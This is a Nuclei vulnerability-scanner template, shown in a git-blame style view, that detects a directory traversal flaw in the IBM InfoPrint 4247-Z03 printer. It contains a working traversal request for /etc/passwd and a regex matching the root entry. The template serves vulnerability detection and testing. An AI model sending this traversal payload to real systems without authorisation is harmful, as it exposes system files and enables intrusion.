nuclei-templates/vulnerabilities/ibm/ibm-infoprint-lfi.yaml

24 lines
592 B
YAML
Raw Normal View History

id: ibm-infoprint-lfi
info:
name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
2021-06-09 12:20:56 +00:00
author: harshbothra_
severity: medium
description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer.
reference: https://www.exploit-db.com/exploits/47835
tags: ibm,lfi
requests:
- method: GET
path:
2020-09-17 08:13:19 +00:00
- '{{BaseURL}}/./../../../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: status
status:
- 200
2020-09-17 08:15:41 +00:00
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2020-09-17 08:15:41 +00:00
part: body